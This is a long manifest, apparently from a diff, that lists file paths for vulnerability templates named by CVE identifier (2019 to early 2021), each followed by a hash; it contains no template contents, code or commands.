-http/cves/2019/CVE-2019-7192.yaml:edc227065cb0368a31ffc2e74afc3632df1d1444 -http/cves/2019/CVE-2019-7219.yaml:23601d2a7b76693b463f480e9a7be109bc9cb855 -http/cves/2019/CVE-2019-7238.yaml:4231cd99576c2e6f2d8c31aeefa848660321f94e -http/cves/2019/CVE-2019-7254.yaml:398fbc8e44bb815b120ee959d091cf28d35b6d9d -http/cves/2019/CVE-2019-7255.yaml:5f4b115ca2dcbc82d2dca2ec8a6f8da391d5392e -http/cves/2019/CVE-2019-7256.yaml:58295af0337b00734187d190229be98d7f1d402f -http/cves/2019/CVE-2019-7275.yaml:e8259d7559543a28486efca73f62b22e77a6ac3b -http/cves/2019/CVE-2019-7315.yaml:572f93024428eedc5a45675c9a612af72a84f2d5 -http/cves/2019/CVE-2019-7481.yaml:53f138226e42452d2c55663533428619276c59bb -http/cves/2019/CVE-2019-7543.yaml:22fef7d1b09c8a870ed5aa582f6a63da1b803284 -http/cves/2019/CVE-2019-7609.yaml:4d4a45b83f0b9846ae63264055d3654f1d46cca0 -http/cves/2019/CVE-2019-8086.yaml:1f824675a221171b98ee9963bfff2d956a35a24d -http/cves/2019/CVE-2019-8390.yaml:3956a0d2abd804ae8dfa1d957c1a75d90d1cc53d -http/cves/2019/CVE-2019-8442.yaml:175d71f5c319329fca33e64627e49f7d91624995 -http/cves/2019/CVE-2019-8446.yaml:e92506579f3e30ff768f50fda945ddffa7e985c2 -http/cves/2019/CVE-2019-8449.yaml:29347d464a7ae187362323251c2d3103eeb28426 -http/cves/2019/CVE-2019-8451.yaml:289b07e213f27ddafe93ba6d532e2b2a414c27e4 -http/cves/2019/CVE-2019-8903.yaml:38bca1c68339f3b55c026f60af43a2a6ce559e5d -http/cves/2019/CVE-2019-8937.yaml:7fbfc0e9c7315950605937f23c42251b343c9ffc -http/cves/2019/CVE-2019-8982.yaml:7c7c7b78c5f8f3fb9e69fc932fe87a011da25aa9 -http/cves/2019/CVE-2019-9041.yaml:2265fe409ad5f218b2a24f035a1784ea2ba819f1 -http/cves/2019/CVE-2019-9618.yaml:6624c8025fe84e952bbc9307824c85fd8aab4816 -http/cves/2019/CVE-2019-9670.yaml:358d5bfad6264d4846b24864ac496a0f567d172c -http/cves/2019/CVE-2019-9726.yaml:339c347eaa831e1a19a23248c28f93e37c5e9d62 -http/cves/2019/CVE-2019-9733.yaml:00d7bff0699993662060543c126ca1b0aa499c8a -http/cves/2019/CVE-2019-9915.yaml:fb83daf64948fc323360267efd07566df5ad92dc -http/cves/2019/CVE-2019-9922.yaml:8d8f682bc69d2e5a248ff72a0d8bd8a3b3e4d1cb -http/cves/2019/CVE-2019-9955.yaml:f9989889aa0a76adfae282464461a064803c2fe8 -http/cves/2019/CVE-2019-9978.yaml:abfe4699fd10f52dc3d96ad2678c758a803e6df6 -http/cves/2020/CVE-2020-0618.yaml:f606971d91cdde5213812cf454e44ead6c66ff05 -http/cves/2020/CVE-2020-10148.yaml:d0f98004b5f1ac9c69bb8ce1efaf28be82206075 -http/cves/2020/CVE-2020-10199.yaml:fa573df10826ec3e2c7041db0ef791110c3dc99c -http/cves/2020/CVE-2020-10220.yaml:d4198c17d90c22e291f9ffcf41aa5838efcb3b70 -http/cves/2020/CVE-2020-10546.yaml:f962c8d562cb069384bbca258b1f115fdc4c79c4 -http/cves/2020/CVE-2020-10547.yaml:af775730df472cb87598239f9679590d24c4c513 -http/cves/2020/CVE-2020-10548.yaml:14d5300135b26a3ec78596300a1631daf5710db0 -http/cves/2020/CVE-2020-10549.yaml:c0773f01e1f31de8e9e168bcdc45c96feb781649 -http/cves/2020/CVE-2020-10770.yaml:10fbd4be42b0f293ffa602b6f55a09758a77f6cb -http/cves/2020/CVE-2020-10973.yaml:06479d6db05d2d0a793b610689a45b36e4f2376a -http/cves/2020/CVE-2020-11034.yaml:bd90f90361e94d9ee8bd37b8dd99d47f9e1db472 -http/cves/2020/CVE-2020-11110.yaml:ee6612bd26d13247b262f97e38bf05454524ec4c -http/cves/2020/CVE-2020-11450.yaml:ee82bd32cbdd4a3d21650ff7fca47d8ab23c95a4 -http/cves/2020/CVE-2020-11455.yaml:a2915cc6f64d5c33c93e4b000edd3ef95093bc24 -http/cves/2020/CVE-2020-11529.yaml:612985330b39eefa81d0d15a6f73b4d4e527afc9 -http/cves/2020/CVE-2020-11530.yaml:8bef34db7f138b633bbd8d34e3e85d8f4a136e87 -http/cves/2020/CVE-2020-11546.yaml:6bdd0b14b344bfb41c83a248299bf91a33ce6a1c -http/cves/2020/CVE-2020-11547.yaml:f6623f296c5896fa57aecdac40f6e4ca6312a7bf -http/cves/2020/CVE-2020-11710.yaml:7f03b0e6f7082424549fee844100dc73c8e27cae -http/cves/2020/CVE-2020-11738.yaml:87efcd1f63371291d8fbd42ca0d7a9a93d2d0bdb -http/cves/2020/CVE-2020-11798.yaml:ae7b7d2e022103cba8a4cacc64dc978ec36cc6f7 -http/cves/2020/CVE-2020-11853.yaml:78abbf56f2728480032a010effda5d13d447e64d -http/cves/2020/CVE-2020-11854.yaml:85424a364df3e2e8dd18fc7afaf670841c82fdda -http/cves/2020/CVE-2020-11930.yaml:f003956f75660fccf2e9f33e34c457ade42c7bca -http/cves/2020/CVE-2020-11978.yaml:b270a16b6e35514a534801aba7783115caa5f3e7 -http/cves/2020/CVE-2020-11991.yaml:047306e5beabddd044054e4645eadc3fe9024593 -http/cves/2020/CVE-2020-12054.yaml:1731bfe4b901cebad45673a45ca4f92f1b069343 -http/cves/2020/CVE-2020-12116.yaml:1de0bc09cb37c0658da61f3987112e0d7dfa3e68 -http/cves/2020/CVE-2020-12127.yaml:9ee0a44080a11e33bd553826a04c8b8c624be7f3 -http/cves/2020/CVE-2020-12447.yaml:f92a06e15d5efcecaa6b165a3fad180ca1da79ae -http/cves/2020/CVE-2020-12478.yaml:84da6bcd149244cbbb43e6087fa499d79e4a640d -http/cves/2020/CVE-2020-12720.yaml:9a3cba63f2e7c672122bdcd567cd0378e481c8f3 -http/cves/2020/CVE-2020-12800.yaml:f2daa57832c51914b82fe5779a2434de654a6d84 -http/cves/2020/CVE-2020-13117.yaml:492db1dd9a20891a01fb706c09529b3fada96b7e -http/cves/2020/CVE-2020-13121.yaml:8b58bc52ee3fc3c47acad28d2c72a6689e778e02 -http/cves/2020/CVE-2020-13158.yaml:4c5313407e2bb1f3589140e63a296c0caf9d1e26 -http/cves/2020/CVE-2020-13167.yaml:0dc9274d51e23f87e0be0ba2d5eb7e39bc03792a -http/cves/2020/CVE-2020-13258.yaml:6ceabf417327dc80ae8ae0f3b2588c0c45003c2e -http/cves/2020/CVE-2020-13379.yaml:b84d2b57eb7b003d01ae043c76277e461e3bcf2e -http/cves/2020/CVE-2020-13405.yaml:6a43f48d350aebf56c7a4ce8bb5c79c5e387d1ef -http/cves/2020/CVE-2020-13483.yaml:a3b8763ec3332770c43721cd46a9f3d958d814f4 -http/cves/2020/CVE-2020-13700.yaml:a7fd845c0b74b8ce5c06d5c99cd16af416d7ff95 -http/cves/2020/CVE-2020-13820.yaml:96ee542ebd3d26e769e9a0a941ad2e2690d6bcad -http/cves/2020/CVE-2020-13927.yaml:d156819cd061552ed5daf622dfd0d370fa3b183b -http/cves/2020/CVE-2020-13937.yaml:ef4df63f980eb167713f75453b487a411065a694 -http/cves/2020/CVE-2020-13942.yaml:ceafbc7d93460a1e84a014408ddab7ffa1e5d3f0 -http/cves/2020/CVE-2020-13945.yaml:5432177946515c3b19ca8fea2389171800b472bb -http/cves/2020/CVE-2020-14092.yaml:24b7a232cde743bf096c29f164c91f91ea302a43 -http/cves/2020/CVE-2020-14144.yaml:647a770766ebfd9a857c4c34cc5d2657749f78c2 -http/cves/2020/CVE-2020-14179.yaml:9d5f4a8e59de2c8cd0d8cc7703ed1966c690ffd0 -http/cves/2020/CVE-2020-14181.yaml:8c88c550a35fc5d79e1e59867503c9f889c69994 -http/cves/2020/CVE-2020-14408.yaml:523028eab8f36230eae92b4d3668cf4d881502ca -http/cves/2020/CVE-2020-14413.yaml:6ad5e6331fbe62cbd5835f09a8b95f5631e0ba96 -http/cves/2020/CVE-2020-14750.yaml:977cb1156bb1c4534da0c46a25d7f5852c0802f9 -http/cves/2020/CVE-2020-14864.yaml:4210fa90525bbbd7e26a505fd00f6ff5fb38509a -http/cves/2020/CVE-2020-14882.yaml:32180021e58dc82a45ef608eaedc9122a62cd19f -http/cves/2020/CVE-2020-14883.yaml:a51b063eb33297a9324d363584de9fdaccf07f83 -http/cves/2020/CVE-2020-15050.yaml:cfe1078d06ccc79368dfa03dec8c5a19133fc05a -http/cves/2020/CVE-2020-15129.yaml:3566a517a359f2aff1804c52722e79eeada28698 -http/cves/2020/CVE-2020-15148.yaml:e9cb731757028be6f49a0adca06fd683697d5d0c -http/cves/2020/CVE-2020-15227.yaml:3786c170cbaeccabe111c91575f4b672da2fce1c -http/cves/2020/CVE-2020-15500.yaml:7bda3489ea1c9bfd08ce30f9a2e7404a3f21d1e1 -http/cves/2020/CVE-2020-15505.yaml:cdc25c455d09390a7289e7e0f519d62c51e0d17f -http/cves/2020/CVE-2020-15568.yaml:595340c7ee5f8217b9d2e16bcfdaa5f158269520 -http/cves/2020/CVE-2020-15867.yaml:58c12f95831855f54f7e2050d4620a03f091366b -http/cves/2020/CVE-2020-15895.yaml:79e5474c09d3c0f80ae694a1d2b2a9ce17e0608e -http/cves/2020/CVE-2020-15920.yaml:cc33f2dbd35b2198ed816291b24b656afd5f6e31 -http/cves/2020/CVE-2020-16139.yaml:f13080e7483b9cbbb5e6af1231e8557c2a0f12b1 -http/cves/2020/CVE-2020-16846.yaml:4bee70e88949d1b102e19f7c68394ce48dc760d7 -http/cves/2020/CVE-2020-16952.yaml:3d0d922a266101059dc4b3d3f978d14b84405024 -http/cves/2020/CVE-2020-17362.yaml:1df86b93e46eeee6d6cf0745cd5dcb1cde46318f -http/cves/2020/CVE-2020-17453.yaml:03e9e548bfe57a1c5927050b038f086b1434faea -http/cves/2020/CVE-2020-17456.yaml:52b7f4f92bb9d1fd1af119f801cf0eaac3f187d2 -http/cves/2020/CVE-2020-17463.yaml:cdd2aeec08aaa68a2d77bfcce09f7b39b3f9b956 -http/cves/2020/CVE-2020-17496.yaml:b403e7498235705a5007a5fd5d60b30b04701f4a -http/cves/2020/CVE-2020-17505.yaml:0ac6516e1a9e61769b89c65107b9c22d17f92ed0 -http/cves/2020/CVE-2020-17506.yaml:a9ab8370c68ee1410d5ae8d67fbd133a990864ed -http/cves/2020/CVE-2020-17518.yaml:bc04c9b47faf5fab8f76fe11768a6ab95183a0e0 -http/cves/2020/CVE-2020-17519.yaml:ce52cd0fe34b1e935e786bc5b97ccc01f4ad58bb -http/cves/2020/CVE-2020-17526.yaml:e115317a7f8d2267d186057443ed15a928d826eb -http/cves/2020/CVE-2020-17530.yaml:e9ec6df5a27b69dab9f4c98dd90b3899bda22c60 -http/cves/2020/CVE-2020-18268.yaml:d2eb30961afad309bf848c5ee16c00f4b4dc2a7e -http/cves/2020/CVE-2020-19282.yaml:261267b9186dc73e0ab267e63dcd4325daaa0d90 -http/cves/2020/CVE-2020-19283.yaml:23828c0fd4e81c76aaca13f72464f3d8551812af -http/cves/2020/CVE-2020-19295.yaml:3301c5ac756ed795c068ba8bcc4a85cfb2121eab -http/cves/2020/CVE-2020-19360.yaml:7ac96b947be20f7dc4e0f4aebe80af023477c6b5 -http/cves/2020/CVE-2020-1943.yaml:2db599818d9e326e92c85cd50e55c3f0db38fd87 -http/cves/2020/CVE-2020-19515.yaml:5531859d97018a14b46ef666a6280059dfd6ef85 -http/cves/2020/CVE-2020-1956.yaml:689f1898a8fe3ce527db226b9f4bc6808e84fb60 -http/cves/2020/CVE-2020-19625.yaml:7e8a552a898ef652ec5b7a34790f7829b27fdbff -http/cves/2020/CVE-2020-20285.yaml:8f01c22fbccf4c805753c9c5046d754474dde7cf -http/cves/2020/CVE-2020-20300.yaml:4bf5aedb9d82f1b99913c97487d9c17095173c23 -http/cves/2020/CVE-2020-2036.yaml:d70691b457d23f9e14ed21fe25f86d22a71ae070 -http/cves/2020/CVE-2020-2096.yaml:388b333ac57cc01ee709edf274b6e21106190dd6 -http/cves/2020/CVE-2020-20982.yaml:88492de9e885210eb91a8443664cd122ee9de6fa -http/cves/2020/CVE-2020-20988.yaml:3aeae58e64cccc6cbd4f9909344c98a2aa9a05dd -http/cves/2020/CVE-2020-21012.yaml:283d543d70d15ed73a54d93ddc413e05bcfbb3be -http/cves/2020/CVE-2020-2103.yaml:1491b329af6a8a1e67524d53be61ecc148e5bde0 -http/cves/2020/CVE-2020-21224.yaml:3bd6b66502296a01ad6f07a2f5e86fc812264a9f -http/cves/2020/CVE-2020-2140.yaml:a7e6f5a17b1fdc80cdcf5e04a504f41c87ada843 -http/cves/2020/CVE-2020-22208.yaml:f59c8a959a4a878877a92d43f854cda6f1283e8a -http/cves/2020/CVE-2020-22209.yaml:2cb098867a4a6cef7ea7fba8de40efdd524310e3 -http/cves/2020/CVE-2020-22210.yaml:db5b19ac7cd52a966117b0b56b3b810ef6652167 -http/cves/2020/CVE-2020-22211.yaml:9d69ea03546f966536c838d1a15e671c5f50a118 -http/cves/2020/CVE-2020-22840.yaml:ec6d9177d558d5d5e70b9a4ec1d82262f23a1166 -http/cves/2020/CVE-2020-23015.yaml:cdd5c29d41e9cbdc091db79ff43cc67fdf94adca -http/cves/2020/CVE-2020-23517.yaml:f2215b5df9907a5e5ade18e48e9e4e1357e506c9 -http/cves/2020/CVE-2020-23575.yaml:f304c0ecc8b809afb90acb671338e977e3743eac -http/cves/2020/CVE-2020-23697.yaml:e7df73b8a2a84dc8add355654e77509e882b5f4d -http/cves/2020/CVE-2020-23972.yaml:0801874b8e84f8859af32bec813bec3e0add2f15 -http/cves/2020/CVE-2020-24148.yaml:cd7aa4182430662ca9701ccf3a738c3d2bbcf06a -http/cves/2020/CVE-2020-24186.yaml:9acb451ae90b0fbd240987bd2bd550c65d60dd0f -http/cves/2020/CVE-2020-24223.yaml:fd9504313cae8c782067db3a7fe57f762a8e5c0f -http/cves/2020/CVE-2020-24312.yaml:db59862b1303ff238360770fb8e90baa9b626a55 -http/cves/2020/CVE-2020-24391.yaml:e36ec660ba76d8e3cd3c9712761d8c12d4387ae8 -http/cves/2020/CVE-2020-24550.yaml:e5a66858a64f91a579d5ba2f5823deb901db3920 -http/cves/2020/CVE-2020-24571.yaml:bc263629d4800e676aaf0edb62c478e3931ac5e4 -http/cves/2020/CVE-2020-24579.yaml:63aebf6ed3e2ce9f83728c05b8266d8675354062 -http/cves/2020/CVE-2020-24589.yaml:8aa6ecb23e75d8c0ac83d7841636d1af9b25fbd8 -http/cves/2020/CVE-2020-24902.yaml:310cec1245917c5a057b6e7bc8a1da301d912405 -http/cves/2020/CVE-2020-24903.yaml:e3ad15b428e14e9ccd6dc9ce5c45d00d5ea0c955 -http/cves/2020/CVE-2020-24912.yaml:4c0c633b87e34712a4bb8a7cd2031d4b5053d8d7 -http/cves/2020/CVE-2020-24949.yaml:e32f1ebf3d90deecb7ea134557b9feacdf4e3542 -http/cves/2020/CVE-2020-25078.yaml:fbac27bd89959128aa8eba42bb2cd918dcd6b47b -http/cves/2020/CVE-2020-25213.yaml:f73a12327ad63badc54b4121d06cb8419d4aa2a9 -http/cves/2020/CVE-2020-25223.yaml:06c4f320fb64d20429d9103ac00f97f74eb9ee94 -http/cves/2020/CVE-2020-25495.yaml:93ef16911dc7e29000131781671e201d30552d25 -http/cves/2020/CVE-2020-25506.yaml:93b0871ef8cb0c4f7f3595104642e122f283222c -http/cves/2020/CVE-2020-2551.yaml:afdc7ce9596e5421adeb99b9f0152ee65eb0a98d -http/cves/2020/CVE-2020-25540.yaml:d3f5fbef216aac6672a87a192213b7a5095e9170 -http/cves/2020/CVE-2020-25780.yaml:71a29c9f8e0f0d25eec141d0afa198bf0a17f20d -http/cves/2020/CVE-2020-25864.yaml:4516197591b180a531cf6589e5b3663de3202c75 -http/cves/2020/CVE-2020-26073.yaml:7dac56411c8adae2fcc2fc30285e67deab56f746 -http/cves/2020/CVE-2020-26153.yaml:efa06b0a4c8446c109476828de6f206f0eacae1a -http/cves/2020/CVE-2020-26214.yaml:f38fea7bcd0c0d6075ad2066bd949dec0c2e132a -http/cves/2020/CVE-2020-26217.yaml:2aaa083c1374ba2dc5e48c8ec95a38395a8e1ae4 -http/cves/2020/CVE-2020-26248.yaml:406f30cce4a747d4bba6cc0ce7278f6705ff43d6 -http/cves/2020/CVE-2020-26258.yaml:7c738ac2b66396905e054df4c2573bca929a3063 -http/cves/2020/CVE-2020-26413.yaml:457f138e8fc9928450e0c2117c5b54a37b024a41 -http/cves/2020/CVE-2020-26876.yaml:38e318a863696e908ddc5be2473a326c4c8f7864 -http/cves/2020/CVE-2020-26919.yaml:3ee3cda1657471fa848b72bcc4d4633055444ee2 -http/cves/2020/CVE-2020-26948.yaml:5761680a4e4722def1822f37893057bb3f03e84f -http/cves/2020/CVE-2020-27191.yaml:cf7023ff41aba8f38b6d40335f5373161c7b85f9 -http/cves/2020/CVE-2020-2733.yaml:aaa9b2e7493bb14171c37bb60f92c7aa025737b0 -http/cves/2020/CVE-2020-27361.yaml:b773a239e5b6ef316c129e2138f5a3e211dd4f59 -http/cves/2020/CVE-2020-27467.yaml:bd3e4ea0b0ff7fe966315f5898452d9d740bce34 -http/cves/2020/CVE-2020-27481.yaml:66944b371313f13fc873c67803a1be753f783e36 -http/cves/2020/CVE-2020-27735.yaml:035a3399512fcb44de46e0bf40bbdd10a9cb1372 -http/cves/2020/CVE-2020-27866.yaml:8731a8d8b1c86dd8eb6855475069cb9cab75af15 -http/cves/2020/CVE-2020-27982.yaml:19bdb475b2ae3ceca6caf7e3130798660496f093 -http/cves/2020/CVE-2020-27986.yaml:61c25ea9e62492e746f5d729e6285e38d33f1004 -http/cves/2020/CVE-2020-28185.yaml:d739dc624f7045ce1b9a8aec3419447116eada64 -http/cves/2020/CVE-2020-28188.yaml:93f82064d1c3880e50eadf322ad730c5d95c48d9 -http/cves/2020/CVE-2020-28208.yaml:f27912be86b8eee2b1431eb8abbf97932c0c59c7 -http/cves/2020/CVE-2020-28351.yaml:24dee02e9af9bb37f06f247f7f911118faa8faff -http/cves/2020/CVE-2020-28871.yaml:a8b686242e5b474d7c90f9e0c186465480b6300b -http/cves/2020/CVE-2020-28976.yaml:b1342a260f6834061fff2066a9905337bcbcc035 -http/cves/2020/CVE-2020-29164.yaml:d4c4bd3eb0953f7c79b4be28adbc6d337ef8e298 -http/cves/2020/CVE-2020-29227.yaml:c023e84556284635c9cd49e57ee08aa2a0b01a5c -http/cves/2020/CVE-2020-29284.yaml:fd5e301c8bfa360ad0f20a9d458ce472f81d1904 -http/cves/2020/CVE-2020-29395.yaml:811d82a62c0271a97b787e056b44e9871deeb2b9 -http/cves/2020/CVE-2020-29453.yaml:5d8e63744b2340a68baf1a4f069bfc8fee7fa6ad -http/cves/2020/CVE-2020-29583.yaml:eea17591ab47284355aa809f86fd1d9208c9e769 -http/cves/2020/CVE-2020-29597.yaml:4a171d7d478bbad20267fa0460ffeab03369429a -http/cves/2020/CVE-2020-3187.yaml:2efeb634830701f9b4a58a3edde7528c217f95b4 -http/cves/2020/CVE-2020-3452.yaml:b7ac7132a1292751772810c23ad81a5183e9cd41 -http/cves/2020/CVE-2020-35234.yaml:2af14e6ceb019cc797f6c9ec43f83fa6be67a545 -http/cves/2020/CVE-2020-35338.yaml:52015f21746c1a0cda39550c98f2a496ed7c29c9 -http/cves/2020/CVE-2020-35476.yaml:505a740ae27a171c9ba3cd4045ad22e2e3c163db -http/cves/2020/CVE-2020-35489.yaml:c8eb843a2c8ae76a1b04462d3a315a11eb926fd3 -http/cves/2020/CVE-2020-35580.yaml:b3baca2012cc592d2ff26638ff9770079924f0a8 -http/cves/2020/CVE-2020-35598.yaml:e47b7777e7414d606af1d719f3a408a039b30e2c -http/cves/2020/CVE-2020-35713.yaml:8960c9f6852d08bb0b80cb27177a17357adbcf8c -http/cves/2020/CVE-2020-35729.yaml:b0e52c87d27dcc2b3baacc63312c1a654194cf83 -http/cves/2020/CVE-2020-35736.yaml:73065de53671c9c1cba35cb13267980b68660f80 -http/cves/2020/CVE-2020-35749.yaml:382dff0f6aebb91c96172ba40083ef152773fcc1 -http/cves/2020/CVE-2020-35774.yaml:ea05a3580603ff6eade6ec059ed85c8588b17920 -http/cves/2020/CVE-2020-3580.yaml:71c07503ee92760ad3a569abcf77afa8126ea7ef -http/cves/2020/CVE-2020-35846.yaml:bd45a8eefda85d047e3023b60cdcb2b8a6efa610 -http/cves/2020/CVE-2020-35847.yaml:47595683cd49c6a72d34da9e09f2492c2dad439e -http/cves/2020/CVE-2020-35848.yaml:a3026bb140e9856af50595c2afd564ee0120ed63 -http/cves/2020/CVE-2020-35951.yaml:780178ac5842ccee789adb3f6ab3fa09b4721e76 -http/cves/2020/CVE-2020-35984.yaml:494bbe80b257a676eca084a4a3facd2a3e092a7a -http/cves/2020/CVE-2020-35985.yaml:b52d84896ed42d051e9ca6f53ea0157a00e4b831 -http/cves/2020/CVE-2020-35986.yaml:2ff63b544f87b259567f277fc5cec1a2532a5ed1 -http/cves/2020/CVE-2020-35987.yaml:69cc026e54d3ca8c81fecaea60d525224d0475af -http/cves/2020/CVE-2020-36112.yaml:5b6f72073bb165afff4aa172e1c6b10476c5ecb7 -http/cves/2020/CVE-2020-36289.yaml:5e5d997a16304cc19e68b466eb5bad002bd6f394 -http/cves/2020/CVE-2020-36365.yaml:8d346886b7659ff1a8728886f857ce16b878bce4 -http/cves/2020/CVE-2020-36510.yaml:6194ff4e5f03915410f27d778a60295ecfdaa327 -http/cves/2020/CVE-2020-4463.yaml:66a03e112cfbdeba6ceda305236cc38bfb62b0eb -http/cves/2020/CVE-2020-5191.yaml:eba38811ca4c872fef98dc9802395355f7a3c05b -http/cves/2020/CVE-2020-5192.yaml:d3936e466c1eaf0ca4d5313767d622209b37bfc9 -http/cves/2020/CVE-2020-5284.yaml:d1a71d0aa42f4aff2d5f7e84d3fdc8e7091fe2af -http/cves/2020/CVE-2020-5307.yaml:7ada9b22c17b517e7d968d1502f05cb0547f9189 -http/cves/2020/CVE-2020-5405.yaml:a209b10118f161e79b99af89ec0f0794860c102e -http/cves/2020/CVE-2020-5410.yaml:86588030feb1f510cc14d490476a274027404558 -http/cves/2020/CVE-2020-5412.yaml:6a8eda44a5161242f50922860fdae027baaff3cd -http/cves/2020/CVE-2020-5775.yaml:c6b2814212f9b103b704f5273b3491fffab06e5b -http/cves/2020/CVE-2020-5776.yaml:5c403f9fb0c1d24f2135bcd6d41a1490090d3848 -http/cves/2020/CVE-2020-5777.yaml:4eeb1a0d59d7a8728c3d0204618ae903ef67db85 -http/cves/2020/CVE-2020-5847.yaml:1377f9fdc66b70d1a4ee7224005f6f86c763c736 -http/cves/2020/CVE-2020-5902.yaml:2d243f121b4c451349cdcf8b8128db404a6dbd32 -http/cves/2020/CVE-2020-6171.yaml:8d45c89746dc65c488841664a3e952b7093646fe -http/cves/2020/CVE-2020-6207.yaml:706402909523a9c5510d0874a2149b3c0b7f8778 -http/cves/2020/CVE-2020-6287.yaml:84873187a485444302eb3140a1fbf7d9d441a3f6 -http/cves/2020/CVE-2020-6308.yaml:e74347f7c55c2494f02f60f8c9ef148180e19d41 -http/cves/2020/CVE-2020-6637.yaml:83865efaf20ba293a391b004746ae9093fbb3e32 -http/cves/2020/CVE-2020-7107.yaml:51af76d4c88776794c5e16456d78fdcc1497c0ac -http/cves/2020/CVE-2020-7136.yaml:5dc86c2890bf0a2db546ec2054b8c1bb1ee3670b -http/cves/2020/CVE-2020-7209.yaml:2697402254cc6d23fbc2e116cce98916ebd86b3e -http/cves/2020/CVE-2020-7318.yaml:0ea0f63d62e4ced3c2719fee6ed52b83071b5b12 -http/cves/2020/CVE-2020-7796.yaml:96c83a55dda68498bf38218021f5ffe45de17e68 -http/cves/2020/CVE-2020-7943.yaml:460abf66fdd0f89bfd7cf95a8e4d4dd1b99e6249 -http/cves/2020/CVE-2020-7961.yaml:63baaa7669c6bf568d7fae2be856f3ec9c01853f -http/cves/2020/CVE-2020-7980.yaml:9f70ddcf8bd8a2a08cae7948c75f801a7c6f9bef -http/cves/2020/CVE-2020-8115.yaml:7303b9808a5bcfaabc885d0da7a8aba4bc1ef8ac -http/cves/2020/CVE-2020-8163.yaml:6e0b71adc5cd6ec18bf6a9af412a0ab91051ef61 -http/cves/2020/CVE-2020-8191.yaml:5c77e384df95a546355282b41bf1ba3718c3a666 -http/cves/2020/CVE-2020-8193.yaml:a33e347adac168aba278e8f39387cbfcc0ac28bf -http/cves/2020/CVE-2020-8194.yaml:9d5782d926f42590cef555b0b6c0a3952352ac97 -http/cves/2020/CVE-2020-8209.yaml:09d7cb23deb28cf0157931f4209353b7c5d18d88 -http/cves/2020/CVE-2020-8497.yaml:afd8fae6136c2682306f05af49e17cc6c8ea2bce -http/cves/2020/CVE-2020-8512.yaml:43854c804933f0a2e2163900227ef76ebef48974 -http/cves/2020/CVE-2020-8515.yaml:48e199b52e82f133f5c4fa33e92422672dbdaf2a -http/cves/2020/CVE-2020-8641.yaml:90fcfc97976c92de25d573ea752b46efa989fea3 -http/cves/2020/CVE-2020-8644.yaml:74a82687fabe26e8c2a68333c1fb2d1927d77ff5 -http/cves/2020/CVE-2020-8654.yaml:0331fcc2b6beedaf9abfedb7b5a198eb3b2e81a7 -http/cves/2020/CVE-2020-8771.yaml:86ce53d42936cc827727618908ac6b522aebdffe -http/cves/2020/CVE-2020-8772.yaml:e4875c7a2a78e859e83af04357e241664797eb3f -http/cves/2020/CVE-2020-8813.yaml:946ff12d60d47054ec7e365231bb8c5ccc8253ef -http/cves/2020/CVE-2020-8982.yaml:681a92ab6a1691aaa2e62cee421188adfdc25b5b -http/cves/2020/CVE-2020-9036.yaml:59f314ccaf938c91605047da8f74f12a985f13e0 -http/cves/2020/CVE-2020-9043.yaml:2167088a6631516caa1cdc7d094f9d9ceba74b74 -http/cves/2020/CVE-2020-9047.yaml:2ce6630909968f0d99f6de74df0a339405710cb0 -http/cves/2020/CVE-2020-9054.yaml:adb477f78174836453afa129ec330f68c404074c -http/cves/2020/CVE-2020-9315.yaml:f40ec4c798f492e98bdab9e96f966451c50ca773 -http/cves/2020/CVE-2020-9344.yaml:9101bb34612c239d0fc8d87f40c313e961c4596d -http/cves/2020/CVE-2020-9376.yaml:14f32f6bd2d6db15022c5f491481fc98ceb89d35 -http/cves/2020/CVE-2020-9402.yaml:bdba718cbf2f3760c230e2a353496adb1b0b8b2c -http/cves/2020/CVE-2020-9425.yaml:c9691edd066fc6494c54bcdef2a521fe2f3123c4 -http/cves/2020/CVE-2020-9483.yaml:f9b85f58f952ef21c11aef8a6efeb141b295b621 -http/cves/2020/CVE-2020-9484.yaml:ace32d4fe663b81f235e863d7dcd45a3119ddab9 -http/cves/2020/CVE-2020-9496.yaml:6153af2df6c24dd7fc05ba54bc312713685d6a57 -http/cves/2020/CVE-2020-9757.yaml:bae29ccb592a1270c2592fc2ddfc323e52f27115 -http/cves/2021/CVE-2021-1472.yaml:bc06f0bf4d12abd536e5abd70068210440e62493 -http/cves/2021/CVE-2021-1497.yaml:da2a16e7e0b62b32a28668ff22e26db78957d0a9 -http/cves/2021/CVE-2021-1498.yaml:05ef45232ff166f74d16517368f19b2f88eb3785 -http/cves/2021/CVE-2021-1499.yaml:f2f78401ae2f705ef8ec6f3586f4f2d324fd727d -http/cves/2021/CVE-2021-20031.yaml:f69f325d3b2c88710bb0b6b22c1fadef93665686 -http/cves/2021/CVE-2021-20038.yaml:2d395dd56b113a0a26b11e636142b26fa2d38dcf -http/cves/2021/CVE-2021-20090.yaml:4e3f634be108558c81424d9cdb8f3ee3bc9e820d -http/cves/2021/CVE-2021-20091.yaml:0b3f5079e5d6caf85b136f55376a1246a812c20d -http/cves/2021/CVE-2021-20092.yaml:4d3c4d663cffbd160311095ba1cebf97be539eef -http/cves/2021/CVE-2021-20114.yaml:a745361027edb0a7a2cb79872c94a8c6cf6e9a7c -http/cves/2021/CVE-2021-20123.yaml:7bc4de57846028de9d2b1f8547b45dfb89833788 -http/cves/2021/CVE-2021-20124.yaml:74359a90454d59642591f9fa849f9f0cab945e38 -http/cves/2021/CVE-2021-20137.yaml:462e44d9ef9be98ce8881976f5ea43b63cd0c10c -http/cves/2021/CVE-2021-20150.yaml:1a4228d92b20cebed7ceb45097d7c9ce6c58a0d4 -http/cves/2021/CVE-2021-20158.yaml:0b44379c98592d7a538aaa874c1f814c58dd25b9 -http/cves/2021/CVE-2021-20167.yaml:6a76502c51aaccd6e2f5a6b7fdec0b65396786b4 -http/cves/2021/CVE-2021-20323.yaml:ee3c3b12946e028970f104712c867628af88cf85 -http/cves/2021/CVE-2021-20792.yaml:9a4daa856083db3d3c6d3b6876f7daad453a6725 -http/cves/2021/CVE-2021-20837.yaml:787d7adb13dc2bef743d141b94e1cc4df46c8d9d -http/cves/2021/CVE-2021-21087.yaml:422b24814ad45e4a9a28796263acd3bb6179767e -http/cves/2021/CVE-2021-21234.yaml:cd0672237a2c6f82391fa4882940d9520a6d3df8 -http/cves/2021/CVE-2021-21287.yaml:584840d90cdbbfc1c9da03f63149ba1760445e9d -http/cves/2021/CVE-2021-21307.yaml:6ecb20add9512ffc862d88d729106f71c7e389fe -http/cves/2021/CVE-2021-21311.yaml:963e8fef968f4541c13fba971961cf2595ed99b4 -http/cves/2021/CVE-2021-21315.yaml:4b0c470adb9c7e325bd1ea6ed5b9d1ecd60b1647 -http/cves/2021/CVE-2021-21345.yaml:a59b249b5055152ca7b89ca0026a321b973b1a4c 